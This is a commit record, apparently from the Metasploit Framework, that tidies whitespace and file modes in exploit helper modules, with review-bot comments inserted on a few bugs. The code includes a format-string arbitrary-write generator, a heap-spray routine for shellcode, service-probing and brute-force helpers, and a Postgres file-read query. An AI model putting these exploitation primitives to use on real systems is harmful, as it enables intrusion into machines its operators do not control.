tidy pass on exploit mixins

git-svn-id: file:///home/svn/framework3/trunk@10487 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-09-26 21:02:00 +00:00
parent e4bef2ce51
commit f07f354472
20 changed files with 273 additions and 276 deletions


@ -8,9 +8,9 @@ module Msf
#
###
module Exploit::Remote::Arkeia
include Exploit::Remote::Tcp
#
# Creates an instance of a MSSQL exploit module.
#
@ -26,8 +26,8 @@ module Exploit::Remote::Arkeia
self.recv_buff = ''
end
#
# Flush the receive buffer on a new connection
#
@ -35,13 +35,13 @@ module Exploit::Remote::Arkeia
super
self.recv_buff = ''
end
#
# This method dumps some information about the service
#
def arkeia_info
connect
info = { }
resp = ''
@ -63,14 +63,14 @@ module Exploit::Remote::Arkeia
"\x00\x34\x2e\x33\x2e\x30\x2d\x31"+
"\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00"
sock.put(req)
resp = arkeia_recv()
if !(resp and resp[0,4] == "\x00\x60\x00\x04")
disconnect
return false
end
# Authenticate2
req =
"\x00\x73\x00\x00\x00\x00\x00\x0c" +
@ -82,22 +82,22 @@ module Exploit::Remote::Arkeia
if !(resp and resp[0,4] == "\x00\x60\x00\x04")
disconnect
return false
end
end
# SessionSetup1
req =
req =
"\x00\x61\x00\x04\x00\x01\x00\x15"+
"\x00\x00\x31\x35\x33\x39\x38\x00"+
"\x45\x4e\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00"
sock.put(req)
resp = arkeia_recv()
if !(resp and resp[0,4] == "\x00\x43\x00\x00")
disconnect
return false
end
# Begin the ARKADMIN_GET_CLIENT_INFO request
req =
"\x00\x62\x00\x01\x00\x02\x00\x25"+
@ -106,33 +106,33 @@ module Exploit::Remote::Arkeia
"\x45\x4e\x54\x5f\x49\x4e\x46\x4f"+
"\x00\x32\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00"
sock.put(req)
resp = arkeia_recv()
if !(resp and resp[0,4] == "\x00\x43\x00\x00")
disconnect
return false
end
end
# Complete the ARKADMIN_GET_CLIENT_INFO request
req =
"\x00\x63\x00\x04\x00\x03\x00\x11"+
"\x30\x00\x31\x00\x32\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00"
sock.put(req)
sock.put(req)
1.upto(5) { |i|
resp = arkeia_recv()
break if not resp
break if resp =~ /VERSION/
}
if !(resp and resp =~ /VERSION/)
disconnect
return false
end
# Store the version information
mver = resp.match(/IVERSION\x00([^\x00]+)/)
info['Version'] = mver[1] if mver
@ -140,7 +140,7 @@ module Exploit::Remote::Arkeia
# Store the hostname information
mver = resp.match(/ISERVNAME\x00([^\x00]+)/)
info['Hostname'] = mver[1] if mver
# Begin the ARKADMIN_GET_MACHINE_INFO request
req =
"\x00\x62\x00\x01\x00\x02\x00\x26"+
@ -149,7 +149,7 @@ module Exploit::Remote::Arkeia
"\x48\x49\x4e\x45\x5f\x49\x4e\x46"+
"\x4f\x00\x33\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00"
sock.put(req)
1.upto(5) { |i|
resp = arkeia_recv()
@ -159,15 +159,15 @@ module Exploit::Remote::Arkeia
if !(resp and resp[0,2] == "\x00\x43")
disconnect
return info
end
end
# Complete the ARKADMIN_GET_MACHINE_INFO request
req =
"\x00\x63\x00\x04\x00\x03\x00\x11"+
"\x30\x00\x31\x00\x33\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00"
sock.put(req)
1.upto(5) { |i|
resp = arkeia_recv()
@ -177,7 +177,7 @@ module Exploit::Remote::Arkeia
if !(resp and resp[0,2] == "\x00\x69")
disconnect
return info
end
end
# Finally, parse out and store all the parameters
resp.split("TPVALUE\x00").each { |x|
@ -186,11 +186,11 @@ module Exploit::Remote::Arkeia
info[ minf[2] ] = minf[1]
end
}
disconnect
return info
end
#
# This method reads from the socket and parses out a single
# arkeia response, buffering the rest
@ -203,19 +203,19 @@ module Exploit::Remote::Arkeia
if (self.recv_buff.length < 8)
return false
end
# Read the length header out of the message
dlen = self.recv_buff[6, 2].unpack('n')[0]
# Do we have the entire response message?
if (self.recv_buff.length >= dlen + 8)
return self.recv_buff.slice!(0, dlen + 8)
end
return false
end
attr_accessor :recv_buff
end
end


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/


@ -47,7 +47,7 @@ module Exploit::Brute
stop = bf.stop_addresses ? bf.stop_addresses.dup : {}
step = bf.step_size
delay = bf.delay
# Enumerate each start address and try to figure out the direction
start.each_pair { |name, addr|
# If there's a stop address, figure out if it's above or below
@ -64,7 +64,7 @@ module Exploit::Brute
direction[name] = bf.default_direction
end
}
# Import start/stop address overrides from the datastore
import_from_datastore(start, 'Start')
import_from_datastore(stop, 'Stop')
@ -101,7 +101,7 @@ module Exploit::Brute
# Stop brute forcing once a session is found
break if session_created?
# Fire off an exploit attempt with the supplied addresses
brute_exploit(curr)
@ -119,16 +119,16 @@ module Exploit::Brute
# we're going to go over
next_addr = step * direction[k]
# If this item has hit a stop address, add it to the stopped
# If this item has hit a stop address, add it to the stopped
# hash and move it no further
if (stop[k])
if ((direction[k] == 1 and curr[k] + next_addr >= stop[k]) or
(direction[k] == -1 and curr[k] + next_addr < stop[k]))
(direction[k] == -1 and curr[k] + next_addr < stop[k]))
stopped << k
next
end
end
# If it's not time to stop, move it
curr[k] += next_addr
}
@ -141,7 +141,7 @@ module Exploit::Brute
#
# This routine is called once per brute force iteration. The addresses
# parameter is a hash of addresses that are incremented each iteration and
# are derived from the target's bruteforce information or the module's
# are derived from the target's bruteforce information or the module's
# datastore in case they are being overriden.
#
def brute_exploit(addrs)
@ -164,8 +164,8 @@ protected
#
# Imports information into the supplied hash from the datastore.
# This is a way of allowing the user to override values for a
# specific brute force target by name without them actually
# This is a way of allowing the user to override values for a
# specific brute force target by name without them actually
# being conveyed in the options list. This is a bit of a change
# from 2.x, but 2.x didn't have per-target brute force
# addresses, which I think is more valuable.


@ -28,10 +28,10 @@ module Exploit::Remote::DB2
], Msf::Exploit::Remote::DB2)
end
#
# This method sends a TCP query packet to the server, using
# datastore options and parses out the reply packet
# datastore options and parses out the reply packet
# into a hash
#
def db2_probe(timeout=5)


@ -52,7 +52,7 @@ module Exploit::DECT_COA
close_coa if self.dect_device
begin
self.dect_device = File.open(datastore['INTERFACE'], "w+")
self.dect_device = File.open(datastore['INTERFACE'], "wb+")
rescue ::Exception => e
print_error("Could not open the Com-On-Air device at #{datastore['INTERFACE']}")
print_error("This module only works on Linux with the appropriate hardware and driver, while running as root")
@ -139,13 +139,13 @@ module Exploit::DECT_COA
when DECT_BAND_BOTH
if (channel < 9)
set_channel(channel + 1)
set_channel(channel + 1)
elsif (channel == 9)
set_channel(23)
set_channel(23)
elsif (channel > 9 && channel < 27)
set_channel(channel + 1)
set_channel(channel + 1)
else
set_channel(0)
set_channel(0)
end
end
end
@ -173,7 +173,7 @@ module Exploit::DECT_COA
end
def parse_call(data)
{
{
'channel' => data[0],
'rssi' => data[1],
'rfpi_raw' => data[2,5],
@ -183,7 +183,7 @@ module Exploit::DECT_COA
def record_coa(filename)
raise RuntimeError, "DECT call recording is not supported yet"
fd = File.open(filename, 'rw')
fd = File.open(filename, 'rb+')
fd.close
end
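Review bot: In record_coa the `File.open(filename, 'rb+')` on the line after the unconditional `raise RuntimeError, "DECT call recording is not supported yet"` is unreachable, so changing its mode from 'rw' to 'rb+' has no runtime effect, and 'rb+' additionally requires filename to already exist, which is unlikely for a fresh recording. If the stub is meant to sketch the eventual behaviour, `fd = File.open(filename, 'wb')` reads closer to that intent; otherwise the two dead lines could simply be dropped and the raise kept. The device open in the first hunk (`File.open(datastore['INTERFACE'], "wb+")`) is sensible for a character device, but it sits under a `rescue ::Exception => e`, which also swallows Interrupt and SystemExit; `rescue ::SystemCallError, ::IOError => e` would report the open failure without masking a user abort.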


@ -22,24 +22,24 @@ module Exploit::Remote::Dialup
], self.class)
deregister_options('RHOST')
begin
require 'telephony'
@telephony_loaded = true
rescue ::Exception => e
@telephony_loaded = false
@telephony_error = e
end
end
end
# Opens the modem connection
def connect_dialup(global = true, opts={})
if (not @telephony_loaded)
print_status("The serialport module is not available: #{telephony_error}")
raise RuntimeError, "Telephony not available"
end
serialport = datastore['SERIALPORT']
baud = datastore['BAUDRATE'].to_i
data_bits = datastore['DATABITS'].to_i
@ -57,7 +57,7 @@ module Exploit::Remote::Dialup
when 'Both' ; Telephony::Modem::HARD | Telephony::Modem::SOFT
else Telephony::Modem::NONE
end
initstring = datastore['INITSTRING']
dialprefix = datastore['DIALPREFIX']
dialsuffix = datastore['DIALSUFFIX']
@ -108,7 +108,7 @@ module Exploit::Remote::Dialup
end
end
# Closes the modem connection
# Closes the modem connection
def disconnect_dialup(nmodem = self.modem)
if(nmodem)
nmodem.flush
@ -136,7 +136,7 @@ module Exploit::Remote::Dialup
while c
c = self.modem.getc
res[:buffer] += c.chr if c
end
end
return res
end
end
@ -181,7 +181,7 @@ module Exploit::Remote::Dialup
return rv
end
attr_accessor :modem
end


@ -16,12 +16,12 @@ module Exploit::FormatString
#
def initialize(info = {})
super
@use_fpu = false
@use_dpa = false
end
#
# Allow caller to override the capabilities
#
@ -29,7 +29,7 @@ module Exploit::FormatString
@use_fpu = fpu
@use_dpa = dpa
end
#
# Detect the capabilities (only works for non-blind)
#
@ -38,7 +38,7 @@ module Exploit::FormatString
@use_fpu = fmtstr_detect_cap_fpu
#print_status("support dpa:#{@use_dpa.to_s}, fpu:#{@use_fpu.to_s}")
end
def fmtstr_detect_cap_dpa
res = trigger_fmt("|%1$08x|")
return nil if not res
@ -48,7 +48,7 @@ module Exploit::FormatString
end
return false
end
def fmtstr_detect_cap_fpu
res = trigger_fmt("|%g|")
return nil if not res
@ -58,7 +58,7 @@ module Exploit::FormatString
end
return false
end
def fmtstr_detect_vulnerable
res = trigger_fmt("|%08x|")
return false if not res
@ -68,7 +68,7 @@ module Exploit::FormatString
end
return false
end
# NOTE: This will likely crash the target process
def fmtstr_detect_exploitable
begin
@ -83,40 +83,40 @@ module Exploit::FormatString
end
return false
end
#
# Generates a format string that will perform an arbitrary write using
# two separate short values
#
def generate_fmt_two_shorts(num_printed, write_to, write_what, targ = target)
arr = Array.new
arr << [ write_what & 0xffff, write_to ]
arr << [ write_what >> 16, write_to + 2 ]
stuff = fmtstr_gen_from_array(num_printed, arr, targ)
end
#
# Generates a format string that will perform an arbitrary write using
# two separate short values
#
def generate_fmtstr_from_buf(num_printed, write_to, buffer, targ = target)
# break buffer into shorts
arr = fmtstr_gen_array_from_buf(write_to, buffer, targ)
# now build the format string in its entirety
stuff = fmtstr_gen_from_array(num_printed, arr, targ)
end
#
# Generates and returns an array of what/where pairs from the supplied buffer
#
def fmtstr_gen_array_from_buf(write_to, buffer, targ = target)
# break buffer into shorts
arr = Array.new
off = 0
@ -128,13 +128,13 @@ module Exploit::FormatString
tb = buffer[off,2].unpack('v')[0].to_i
#print_status("%d %d %d" % [off,buffer.length,tb])
addr = write_to + off
arr << [ tb, addr ]
off += 2
end
return arr
end
#
# Generates a format string from an array of value/address pairs
#
@ -144,7 +144,7 @@ module Exploit::FormatString
# sort the array -- for optimization
arr = arr.sort { |x,y| x[0] <=> y[0] }
# build up the addrs and fmts buffers
fmts = ""
addrs = ""
@ -152,18 +152,18 @@ module Exploit::FormatString
arr.each do |el|
# find out how much to advance the column value
prec = fmtstr_target_short(el[0], num)
# for non-dpa, if the prec is more than 8, we need something to pop
if not @use_dpa and prec >= 8
addrs << rand_text(4)
end
# write here!
addrs << [el[1]].pack('V')
# put our advancement fmt (or bytes)
fmts << fmtstr_advance_count(prec)
# fmt to cause the write :)
if @use_dpa
fmts << "%" + num_pops.to_s + "$hn"
@ -171,11 +171,11 @@ module Exploit::FormatString
else
fmts << "%hn"
end
# update written count
num = el[0]
end
# make sure we dont have bad characters ...
if (bad_idx = has_badchars?(addrs, payload_badchars))
raise BadcharError.new(addrs, bad_idx, addrs.length, addrs[bad_idx]),
@ -190,16 +190,16 @@ module Exploit::FormatString
stuff << "%8x" * num_pops
end
stuff << fmts
return stuff
end
#
# Count how many bytes will print before we reach the writing..
#
def fmtstr_count_printed(num_printed, num_pad, num_pops, arr)
num = num_printed + num_pad
if not @use_dpa
num += (8 * num_pops)
@ -211,43 +211,43 @@ module Exploit::FormatString
if not @use_dpa and prec >= 8
num += 4
end
# account for the addr to write to
num += 4
npr = el[0]
end
return num
end
#
# Generate the number to be used for precision that will create
# the specified value to write
#
#
def fmtstr_target_short(value, num_printed)
if value < num_printed
return (0x10000 - num_printed) + value
end
return value - num_printed
end
#
# Generate a fmt that will advance the printed count by the specified amount
#
def fmtstr_advance_count(prec)
# no need to advance :)
return "" if prec == 0
# asumming %x max normal length is 8...
if prec >= 8
return "%0" + prec.to_s + "x"
end
# anything else, we just put some chars in...
return rand_text(prec)
end
#
# Returns the index of any bad characters found in the supplied buffer.
# (NOTE: copied from encoder.rb)
@ -263,7 +263,7 @@ module Exploit::FormatString
return nil
end
#
# Read a single 32-bit integer from the stack at the specified offset
#
@ -271,7 +271,7 @@ module Exploit::FormatString
# cant read offset 0!
return nil if offset < 1
fmt = ''
fmt << extra
if @use_dpa
@ -286,14 +286,14 @@ module Exploit::FormatString
fmt << "|"
fmt << "%x"
end
res = trigger_fmt(fmt)
return res if not res
numstr = extract_fmt_output(res)
dw = numstr.split('|')[1].to_i(16)
end
end
end


@ -88,8 +88,8 @@ module Exploit::Remote::HttpClient
#
def validate_fingerprint()
# Don't bother checking if there's no database active.
if (framework.db.active and
datastore['FingerprintCheck'] and
if (framework.db.active and
datastore['FingerprintCheck'] and
self.class.const_defined?('HttpFingerprint'))
# Get the module-specific config
opts = self.class.const_get('HttpFingerprint')
@ -180,16 +180,15 @@ module Exploit::Remote::HttpClient
#
def handler(nsock = nil)
# If no socket was provided, try the global one.
if ((!nsock) and
(self.client))
if ((!nsock) and (self.client))
nsock = self.client.conn
end
# If the parent claims the socket associated with the HTTP client, then
# we rip the socket out from under the HTTP client.
if (((rv = super(nsock)) == Handler::Claimed) and
(self.client) and
(nsock == self.client.conn))
(self.client) and
(nsock == self.client.conn))
self.client.conn = nil
end


@ -590,20 +590,20 @@ protected
def js_heap_spray
js = %Q|var memory = new Array();
function sprayHeap(shellcode, heapSprayAddr, heapBlockSize) {
var index;
var heapSprayAddr_hi = (heapSprayAddr >> 16).toString(16);
var heapSprayAddr_lo = (heapSprayAddr & 0xffff).toString(16);
while (heapSprayAddr_hi.length < 4) { heapSprayAddr_hi = "0" + heapSprayAddr_hi; }
while (heapSprayAddr_lo.length < 4) { heapSprayAddr_lo = "0" + heapSprayAddr_lo; }
var index;
var heapSprayAddr_hi = (heapSprayAddr >> 16).toString(16);
var heapSprayAddr_lo = (heapSprayAddr & 0xffff).toString(16);
while (heapSprayAddr_hi.length < 4) { heapSprayAddr_hi = "0" + heapSprayAddr_hi; }
while (heapSprayAddr_lo.length < 4) { heapSprayAddr_lo = "0" + heapSprayAddr_lo; }
var retSlide = unescape("%u"+heapSprayAddr_hi + "%u"+heapSprayAddr_lo);
while (retSlide.length < heapBlockSize) { retSlide += retSlide; }
retSlide = retSlide.substring(0, heapBlockSize - shellcode.length);
var retSlide = unescape("%u"+heapSprayAddr_hi + "%u"+heapSprayAddr_lo);
while (retSlide.length < heapBlockSize) { retSlide += retSlide; }
retSlide = retSlide.substring(0, heapBlockSize - shellcode.length);
var heapBlockCnt = (heapSprayAddr - heapBlockSize)/heapBlockSize;
for (index = 0; index < heapBlockCnt; index++) {
memory[index] = retSlide + shellcode;
}
var heapBlockCnt = (heapSprayAddr - heapBlockSize)/heapBlockSize;
for (index = 0; index < heapBlockCnt; index++) {
memory[index] = retSlide + shellcode;
}
}
|
opts = {


@ -24,7 +24,7 @@ module Exploit::Remote::Ip
# Creates an IP socket for communicating with a remote host
#
def connect_ip(global = true, opts={})
begin
nsock = Rex::Socket::Ip.create(
'Context' =>
@ -66,12 +66,12 @@ module Exploit::Remote::Ip
if (nsock == ip_sock)
self.ip_sock = nil
end
# Remove this socket from the list of sockets created by this exploit
remove_socket(nsock)
end
#
#
# Claims the IP socket if the payload so desires.
# No exploits use raw socket payloads yet...
#


@ -19,11 +19,11 @@ module Exploit::Java
def initialize(info = {})
super
register_advanced_options(
[
OptString.new( 'JavaCache', [true, 'Java cache location',
File.join(Msf::Config.config_directory, "javacache")]),
OptString.new( 'JavaCache', [true, 'Java cache location',
File.join(Msf::Config.config_directory, "javacache")]),
OptString.new( 'AddClassPath', [false, 'Additional java classpath', nil]),
], self.class)
@ -53,14 +53,14 @@ module Exploit::Java
@jvm_init = true
end
def query_jvm
return @jvmInit
end
def save_to_file(classnames, codez, location)
path = File.join( Msf::Config.install_root, "external", "source", location )
if not File.exists? path
Dir.mkdir(path)
end
@ -68,7 +68,7 @@ module Exploit::Java
i = 0
classnames.each { |fil|
file = File.join( path, fil + ".java")
fp = File.open( file, "w" )
fp = File.open( file, "wb" )
print_status "Writing #{fil} to " + file
fp.puts codez[i]
i += 1
@ -80,34 +80,34 @@ module Exploit::Java
if !@rjb_loaded or !@jvm_init
raise RuntimeError, "Could not load rjb and/or the JVM: " + @java_error.to_s
end
if compile_options.class.to_s != "Array" && compile_options
raise RuntimeError, "Compiler options must be of type Array."
end
compile_options = [] if compile_options.nil?
# Create the directory if it doesn't exist
Dir.mkdir(datastore['JavaCache']) if !File.exists? datastore['JavaCache']
# For compatibility, some exploits need to have the target and source version
# set to a previous JRE version.
std_compiler_opts = [ "-target", "1.3", "-source", "1.3", "-d", datastore['JavaCache'] ]
compile_options += std_compiler_opts
java_compiler_klass = Rjb::import('javaCompile.CompileSourceInMemory')
# If we were passed arrays
if classnames.class == [].class && codez.class == [].class
# default compile class
begin
# Sames as java_compiler_klass.CompileFromMemory( String[] classnames,
# Sames as java_compiler_klass.CompileFromMemory( String[] classnames,
# String[] codez, String[] compilerOptions)
success = java_compiler_klass._invoke('CompileFromMemory',
# Signature explained: [ means array, Lpath.to.object; means object
# Thus, this reads as call the method with 3 String[] args.
'[Ljava.lang.String;[Ljava.lang.String;[Ljava.lang.String;',
'[Ljava.lang.String;[Ljava.lang.String;[Ljava.lang.String;',
classnames, codez, compile_options)
rescue Exception => e
print_error "Received unknown error: " + e
@ -116,10 +116,10 @@ module Exploit::Java
raise RuntimeError, "The Java mixin received unknown argument-type combinations and cannot continue."
end
if !success
raise RuntimeError, "Compile failed."
raise RuntimeError, "Compile failed."
end
end
def build_jar(output_jar, in_files)
if output_jar.class != "".class || in_files.class != [].class
raise RuntimeError, "Building a jar requires an output_jar and an Array of in_files."
@ -127,7 +127,7 @@ module Exploit::Java
# Add paths
in_files = in_files.map { |file| File.join(datastore['JavaCache'], file) }
create_jar_klass = Rjb::import('javaCompile.CreateJarFile')
file_class = Rjb::import('java.io.File')
@ -141,8 +141,8 @@ module Exploit::Java
#
# http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf
#
def sign_jar(cert_cn, unsiged_jar, signed_jar, cert_alias="signFiles", msf_keystore="msfkeystore",
msf_store_pass="msfstorepass", msf_key_pass="msfkeypass")
def sign_jar(cert_cn, unsiged_jar, signed_jar, cert_alias="signFiles", msf_keystore="msfkeystore",
msf_store_pass="msfstorepass", msf_key_pass="msfkeypass")
# Dependent on $JAVA_HOME/lib/tools.jar that comes with the JDK.
signer_klass = Rjb::import('javaCompile.SignJar')
@ -150,29 +150,33 @@ module Exploit::Java
# Check if the keystore exists from previous run. If it does, delete it.
msf_keystore = File.join(datastore['JavaCache'], msf_keystore)
File.delete msf_keystore if File.exists? msf_keystore
# Rjb pukes on a CN with a comma in it so bad that it crashes to shell
# and turns input echoing off. Simple fix for this ugly bug is
# just to get rid of commas which kinda sucks but whatever. See #1543.
keytool_opts = ["-genkey", "-alias", cert_alias, "-keystore", msf_keystore,
"-storepass", msf_store_pass, "-dname", "CN=#{cert_cn.gsub(",",'')}",
"-keypass", "msfkeypass"]
keytool_opts = [
"-genkey", "-alias", cert_alias, "-keystore", msf_keystore,
"-storepass", msf_store_pass, "-dname", "CN=#{cert_cn.gsub(",",'')}",
"-keypass", "msfkeypass"
]
# Build the cert keystore
signer_klass._invoke('KeyToolMSF','[Ljava.lang.String;',keytool_opts)
jarsigner_opts = ["-keystore", msf_keystore, "-storepass", msf_store_pass,
"-keypass", msf_key_pass, "-signedJar",
File.join(datastore['JavaCache'], signed_jar), # Signed Jar
File.join(datastore['JavaCache'], unsiged_jar), # Input Jar we're signing
cert_alias] # The cert we're using
jarsigner_opts = [
"-keystore", msf_keystore, "-storepass", msf_store_pass,
"-keypass", msf_key_pass, "-signedJar",
File.join(datastore['JavaCache'], signed_jar), # Signed Jar
File.join(datastore['JavaCache'], unsiged_jar), # Input Jar we're signing
cert_alias # The cert we're using
]
signer_klass._invoke('JarSignerMSF','[Ljava.lang.String;',jarsigner_opts)
# There are warnings in the source for KeyTool/JarSigner warning that security providers
# are not released, and if you are calling .main(foo) from another app, you need to release
# them manually. This is not done here, and should Rjb be used for anything in the future,
# this may need to be cleaned up.
end
end
end
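Review bot: The reformatted keytool_opts in sign_jar still hardcodes `"-keypass", "msfkeypass"` while jarsigner_opts a few lines below passes `msf_key_pass`, so a caller that supplies a non-default msf_key_pass gets a keystore whose key password does not match what jarsigner is given and signing fails. The line should read `"-keypass", msf_key_pass` so both tools see the same value as the parameter defaulted in the signature. In the same file, query_jvm returns `@jvmInit` whereas the flag assigned in the preceding hunk is `@jvm_init`, so the predicate always yields nil; `return @jvm_init` fixes it. The `cert_cn.gsub(",", '')` in the -dname argument is a keytool syntax workaround rather than input validation, which is fine as long as cert_cn stays module-controlled rather than user-controlled — worth a one-line comment stating that assumption.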


@ -26,7 +26,7 @@ module Exploit::KernelMode
end
protected
#
# Encapsulates the supplied raw payload within a kernel-mode payload.
#
@ -35,22 +35,22 @@ protected
ext_opt = reqs['ExtendedOptions'] || {}
# Prepend and append any buffers that were specified in the extended
# options. This can be used do perform stack adjustments and other
# options. This can be used do perform stack adjustments and other
# such things against the user-mode payload rather than the
# encapsulating payload.
raw =
raw =
(ext_opt['PrependUser'] || '') +
raw +
(ext_opt['AppendUser'] || '')
# If this is a win32 target platform, try to encapsulate it in a
# If this is a win32 target platform, try to encapsulate it in a
# win32 kernel-mode payload.
if target_platform.supports?(Msf::Module::PlatformList.win32)
ext_opt['UserModeStub'] = raw
new_raw = Rex::Payloads::Win32::Kernel.construct(ext_opt)
end
# If we did not generate a new payload, then something broke.
if new_raw.nil?
raise RuntimeError, "Could not encapsulate payload in kernel-mode payload"

10
lib/msf/core/exploit/pdf_parse.rb Executable file → Normal file

@ -6,9 +6,7 @@
###
module Msf
module Exploit::PDF_Parse
module Exploit::PDF_Parse
def initialize(info = {})
super
@ -248,10 +246,8 @@ module Msf
end
end
return xref_trailers, trailers, startxrefs, root_obj
return xref_trailers, trailers, startxrefs, root_obj
end
end
end
end


@ -11,7 +11,7 @@ require 'msf/core/exploit/tcp'
module Exploit::Remote::Pop2
include Exploit::Remote::Tcp
#
# Creates an instance of an POP2 exploit module.
#
@ -37,7 +37,7 @@ module Exploit::Remote::Pop2
print_status("Connecting to POP2 server #{rhost}:#{rport}...")
fd = super
# Wait for a banner to arrive...
self.banner = fd.get_once
@ -49,7 +49,7 @@ module Exploit::Remote::Pop2
end
#
# Connect and login to the remote POP2 server using the credentials
# Connect and login to the remote POP2 server using the credentials
# that have been supplied in the exploit options.
#
def connect_login(global = true)


@ -54,7 +54,7 @@ module Exploit::Remote::Postgres
uri = "tcp://#{ip}:#{port}"
verbose = args[:verbose] || datastore['VERBOSE']
begin
self.postgres_conn = Connection.new(db,username,password,uri)
self.postgres_conn = Connection.new(db,username,password,uri)
rescue RuntimeError => e
case e.to_s.split("\t")[1]
when "C3D000"
@ -63,14 +63,14 @@ module Exploit::Remote::Postgres
when "C28000"
print_error "#{ip}:#{port} Postgres - Invalid username or password: '#{username}':'#{password}'" if verbose
return :error_credentials
else
else
print_error "#{ip}:#{port} Postgres - Error: #{e.inspect}" if verbose
return :error
end
end
if self.postgres_conn
print_good "#{ip}:#{port} Postgres - Logged in to '#{db}' with '#{username}':'#{password}'" if verbose
return :connected
return :connected
end
end
@ -83,7 +83,7 @@ module Exploit::Remote::Postgres
self.postgres_conn.close if(self.postgres_conn.kind_of?(Connection) && self.postgres_conn.instance_variable_get("@conn"))
self.postgres_conn = nil
end
print_status "#{ip}:#{port} Postgres - Disconnected" if verbose
print_status "#{ip}:#{port} Postgres - Disconnected" if verbose
end
# If not currently connected, postgres_query will attempt to connect. If an
@ -97,7 +97,7 @@ module Exploit::Remote::Postgres
unless self.postgres_conn
return {:conn_error => true}
end
if self.postgres_conn
if self.postgres_conn
sql ||= datastore['SQL']
print_status "#{ip}:#{port} Postgres - querying with '#{sql}'" if datastore['VERBOSE']
begin
@ -117,7 +117,7 @@ module Exploit::Remote::Postgres
end
return {:sql_error => sql_error_msg}
end
postgres_print_reply(resp,sql) if doprint
postgres_print_reply(resp,sql) if doprint
return {:complete => resp}
end
end
@ -158,14 +158,14 @@ module Exploit::Remote::Postgres
uri = "tcp://#{rhost}:#{rport}"
verbose = args[:verbose] || datastore['VERBOSE']
begin
self.postgres_conn = Connection.new(db,username,password,uri)
self.postgres_conn = Connection.new(db,username,password,uri)
rescue RuntimeError => e
version_hash = analyze_auth_error e
return version_hash
return version_hash
end
if self.postgres_conn # Just ask for the version.
resp = postgres_query("select version()",false)
ver = resp[:complete].rows[0][0]
ver = resp[:complete].rows[0][0]
return {:auth => ver}
end
end
@ -229,7 +229,7 @@ module Exploit::Remote::Postgres
end
def postgres_password
if datastore['PASSWORD'].to_s.size > 0
if datastore['PASSWORD'].to_s.size > 0
datastore['PASSWORD'].to_s
else
Rex::Text.rand_text_english(rand(6)+2)
@ -246,7 +246,7 @@ module Exploit::Remote::Postgres
end
temp_table_name = Rex::Text.rand_text_alpha(rand(10)+6)
read_query = %Q{CREATE TEMP TABLE #{temp_table_name} (INPUT TEXT);
read_query = %Q{CREATE TEMP TABLE #{temp_table_name} (INPUT TEXT);
COPY #{temp_table_name} FROM '#(unknown)';
SELECT * FROM #{temp_table_name}}
read_return = postgres_query(read_query,true)


@ -3,7 +3,7 @@ require 'rex/exploitation/seh'
module Msf
###
#
#
# This mixin provides an interface to generating SEH registration records in a
# robust fashion using the Rex::Exploitation::Seh class.
#
@ -38,7 +38,7 @@ module Exploit::Seh
# random padding. This should be derived from the maximum amount of
# space available to the exploit for payloads minus the current payload
# size.
#
#
def generate_seh_record(handler, opts = {})
seh = Rex::Exploitation::Seh.new(
payload_badchars,
@ -48,12 +48,12 @@ module Exploit::Seh
# Generate the record
seh.generate_seh_record(handler, datastore['DynamicSehRecord'])
end
def generate_seh_payload(handler, opts = {})
# The boilerplate this replaces always has 8 bytes for seh + addr
seh_space = 8 + payload.nop_sled_size
seh = Rex::Exploitation::Seh.new(
payload_badchars,
seh_space,
@ -61,7 +61,7 @@ module Exploit::Seh
# Generate the record
rec = seh.generate_seh_record(handler, datastore['DynamicSehRecord'])
# Append the payload, minus the nop sled that we replaced
rec << payload.encoded.slice(payload.nop_sled_size, payload.encoded.length)
end


@ -150,7 +150,7 @@ module Exploit::Remote::SunRPC
def progresolv(number)
names = File.join(Msf::Config.install_root, "data", "wordlists", "rpc_names.txt")
File.open(names,"r").each_line do |line|
File.open(names, "rb").each_line do |line|
next if line.empty? || line =~ /^\s*#/
if line =~ /^(\S+?)\s+(\d+)/ && number == $2.to_i
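Review bot: `File.open(names, "rb").each_line do |line|` in progresolv never closes the descriptor — there is no block form and no explicit close — so each call leaks a handle until the object is finalized; the mode change to "rb" is fine but does not address that. `File.foreach(names, mode: "rb") do |line|` keeps the binary read and closes the file when iteration ends (or on an exception). Separately, `line.empty?` on the following line is never true for lines yielded by each_line because the trailing newline is retained, so blank lines fall through to the regex; `line.strip.empty?` would skip them as the guard apparently intends. progresolv's body continues past the end of the hunk.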


@ -13,74 +13,74 @@ module Exploit::Remote::Telnet
include Exploit::Remote::Tcp
# Borrowing constants from Ruby's Net::Telnet class (ruby license)
IAC = 255.chr # "\377" # "\xff" # interpret as command
DONT = 254.chr # "\376" # "\xfe" # you are not to use option
DO = 253.chr # "\375" # "\xfd" # please, you use option
WONT = 252.chr # "\374" # "\xfc" # I won't use option
WILL = 251.chr # "\373" # "\xfb" # I will use option
SB = 250.chr # "\372" # "\xfa" # interpret as subnegotiation
GA = 249.chr # "\371" # "\xf9" # you may reverse the line
EL = 248.chr # "\370" # "\xf8" # erase the current line
EC = 247.chr # "\367" # "\xf7" # erase the current character
AYT = 246.chr # "\366" # "\xf6" # are you there
AO = 245.chr # "\365" # "\xf5" # abort output--but let prog finish
IP = 244.chr # "\364" # "\xf4" # interrupt process--permanently
BREAK = 243.chr # "\363" # "\xf3" # break
DM = 242.chr # "\362" # "\xf2" # data mark--for connect. cleaning
NOP = 241.chr # "\361" # "\xf1" # nop
SE = 240.chr # "\360" # "\xf0" # end sub negotiation
EOR = 239.chr # "\357" # "\xef" # end of record (transparent mode)
ABORT = 238.chr # "\356" # "\xee" # Abort process
SUSP = 237.chr # "\355" # "\xed" # Suspend process
EOF = 236.chr # "\354" # "\xec" # End of file
SYNCH = 242.chr # "\362" # "\xf2" # for telfunc calls
IAC = 255.chr # "\377" # "\xff" # interpret as command
DONT = 254.chr # "\376" # "\xfe" # you are not to use option
DO = 253.chr # "\375" # "\xfd" # please, you use option
